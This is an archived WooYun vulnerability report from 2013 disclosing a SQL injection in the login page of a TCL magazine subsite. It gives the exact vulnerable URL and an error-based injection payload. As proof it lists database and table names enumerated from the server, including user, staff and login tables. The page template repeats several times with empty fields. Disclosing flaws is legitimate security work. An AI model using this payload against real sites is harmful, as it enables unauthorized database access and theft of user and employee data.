tcl某分站post注入漏洞一枚 | wooyun-2013-043405| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043405

漏洞标题：tcl某分站post注入漏洞一枚

漏洞作者： big、face

提交时间：2013-11-20 10:40

修复时间：2014-01-04 10:41

公开时间：2014-01-04 10:41

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-20：细节已通知厂商并且等待厂商处理中
2013-11-20：厂商已经确认，细节仅向厂商公开
2013-11-30：细节向核心白帽子及相关领域专家公开
2013-12-10：细节向普通白帽子公开
2013-12-20：细节向实习白帽子公开
2014-01-04：细节向公众公开

简要描述：

tcl分站post注入一枚。。

详细说明：

注入链接：
http://magazine.tcl.com/manager/login.aspx?ReturnUrl=%2fmanager%2fDefault.aspx

---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTQ2NTI5ODg0N2RkMnkFzBOIRgAXOQkn7n6vlpwGmYM=&__
EVENTVALIDATION=/wEWBAKA9vC5DAKz8dzmCQLyveCRDwKti4TYC2qxQGuzVG/2OTnZtdWt3tzeksig
&txtuserid=123456' AND 6812=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(107)+CH
AR(97)+CHAR(113)+(SELECT (CASE WHEN (6812=6812) THEN CHAR(49) ELSE CHAR(48) END)
)+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(102)+CHAR(113))) AND 'rUnR'='rUnR&password=
123123&bnok=%C8%B7%B6%A8
---

漏洞证明：

Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: tclContacts
[46 tables]
+--------------------------------------------+
| CountIP                                    |
| Count_Iplocal                              |
| EmailAuthorize                             |
| EmailLog                                   |
| EmailLog2                                  |
| EmailSend                                  |
| EmailTicket                                |
| Fg_Template                                |
| Groups                                     |
| GroupsUser                                 |
| HintRoot                                   |
| History_of_Email                           |
| IntervalSet                                |
| News                                       |
| OperateMan_temp_stat                       |
| SysAdminSysLogonLog                        |
| SysFunction                                |
| SysLang                                    |
| SysLogonLog                                |
| SysMenu                                    |
| SysModule                                  |
| SysOperation                               |
| SysParam                                   |
| SysPower                                   |
| SysRight                                   |
| SysRightFunction                           |
| SysRole                                    |
| SysRole_temp                               |
| SysSystemLog                               |
| SysUser                                    |
| SysUserRole                                |
| TclStaff                                   |
| TclStaffEmailKey                           |
| WebParam                                   |
| dept_name_translate                        |
| dtproperties                               |
| serialDeptno                               |
| sysconstraints                             |
| sysrole_test                               |
| syssegments                                |
| tang_Vietnam_account                       |
| tang_en_account                            |
| tblAutoSync                                |
| tblExcel                                   |
| uVoteContent                               |
| uVoteTitle                                 |
+--------------------------------------------+
Database: msdb
[83 tables]
+--------------------------------------------+
| RTblClassDefs                              |
| RTblClassExtension                         |
| RTblDBMProps                               |
| RTblDBXProps                               |
| RTblDTMProps                               |
| RTblDTSProps                               |
| RTblDatabaseVersion                        |
| RTblEQMProps                               |
| RTblEnumerationDef                         |
| RTblEnumerationValueDef                    |
| RTblGENProps                               |
| RTblIfaceDefs                              |
| RTblIfaceHier                              |
| RTblIfaceMem                               |
| RTblMDSProps                               |
| RTblNamedObj                               |
| RTblOLPProps                               |
| RTblParameterDef                           |
| RTblPropDefs                               |
| RTblProps                                  |
| RTblRelColDefs                             |
| RTblRelshipDefs                            |
| RTblRelshipProps                           |
| RTblRelships                               |
| RTblSIMProps                               |
| RTblScriptDefs                             |
| RTblSites                                  |
| RTblSumInfo                                |
| RTblTFMProps                               |
| RTblTypeInfo                               |
| RTblTypeLibs                               |
| RTblUMLProps                               |
| RTblUMXProps                               |
| RTblVersionAdminInfo                       |
| RTblVersions                               |
| RTblWorkspaceItems                         |
| backupfile                                 |
| backupmediafamily                          |
| backupmediaset                             |
| backupset                                  |
| log_shipping_databases                     |
| log_shipping_monitor                       |
| log_shipping_plan_databases                |
| log_shipping_plan_history                  |
| log_shipping_plans                         |
| log_shipping_primaries                     |
| log_shipping_secondaries                   |
| logmarkhistory                             |
| mswebtasks                                 |
| restorefile                                |
| restorefilegroup                           |
| restorehistory                             |
| sqlagent_info                              |
| sysalerts                                  |
| syscachedcredentials                       |
| syscategories                              |
| sysconstraints                             |
| sysdbmaintplan_databases                   |
| sysdbmaintplan_history                     |
| sysdbmaintplan_jobs                        |
| sysdbmaintplans                            |
| sysdownloadlist                            |
| sysdtscategories                           |
| sysdtspackagelog                           |
| sysdtspackages                             |
| sysdtssteplog                              |
| sysdtstasklog                              |
| sysjobhistory                              |
| sysjobs                                    |
| sysjobs_view                               |
| sysjobschedules                            |
| sysjobservers                              |
| sysjobsteps                                |
| sysnotifications                           |
| sysoperators                               |
| syssegments                                |
| systargetservergroupmembers                |
| systargetservergroups                      |
| systargetservers                           |
| systargetservers_view                      |
| systaskids                                 |
| systasks                                   |
| systasks_view                              |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors                                    |
| discounts                                  |
| employee                                   |
| jobs                                       |
| pub_info                                   |
| publishers                                 |
| roysched                                   |
| sales                                      |
| stores                                     |
| sysconstraints                             |
| syssegments                                |
| titleauthor                                |
| titles                                     |
| titleview                                  |
+--------------------------------------------+
Database: magazine
[21 tables]
+--------------------------------------------+
| accreditarea                               |
| accredited                                 |
| caption                                    |
| comd_list_H                                |
| curqi                                      |
| curqiF                                     |
| downloadFileName                           |
| dtproperties                               |
| hitrecord                                  |
| magamemo                                   |
| magazines                                  |
| program                                    |
| sourceAccredit                             |
| subscription                               |
| sysconstraints                             |
| syssegments                                |
| t_jiaozhu_H                                |
| unit                                       |
| users                                      |
| usersGroup                                 |
| v_magazines                                |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| MSreplication_options                      |
| spt_datatype_info                          |
| spt_datatype_info_ext                      |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_provider_types                         |
| spt_server_info                            |
| spt_values                                 |
| sysconstraints                             |
| syslogins                                  |
| sysoledbusers                              |
| sysopentapes                               |
| sysremotelogins                            |
| syssegments                                |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories                                 |
| CustomerCustomerDemo                       |
| CustomerDemographics                       |
| Customers                                  |
| EmployeeTerritories                        |
| Employees                                  |
| Invoices                                   |
| Orders                                     |
| Products                                   |
| Region                                     |
| Shippers                                   |
| Suppliers                                  |
| Territories                                |
| Alphabetical list of products              |
| Category Sales for 1997                    |
| Current Product List                       |
| Customer and Suppliers by City             |
| Order Details Extended                     |
| Order Details                              |
| Order Subtotals                            |
| Orders Qry                                 |
| Product Sales for 1997                     |
| Products Above Average Price               |
| Products by Category                       |
| Quarterly Orders                           |
| Sales Totals by Amount                     |
| Sales by Category                          |
| Summary of Sales by Quarter                |
| Summary of Sales by Year                   |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+

修复方案：

无

版权声明：转载请注明来源 big、face@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2013-11-20 10:45

厂商回复：

感谢你的工作，已转交相关单位确认处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043405

漏洞标题：tcl某分站post注入漏洞一枚

相关厂商：TCL官方网上商城

漏洞作者： big、face

提交时间：2013-11-20 10:40

修复时间：2014-01-04 10:41

公开时间：2014-01-04 10:41

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 big、face@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043405

漏洞标题：tcl某分站post注入漏洞一枚

相关厂商：TCL官方网上商城

漏洞作者： big、face

提交时间：2013-11-20 10:40

修复时间：2014-01-04 10:41

公开时间：2014-01-04 10:41

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-043405"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 big、face@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：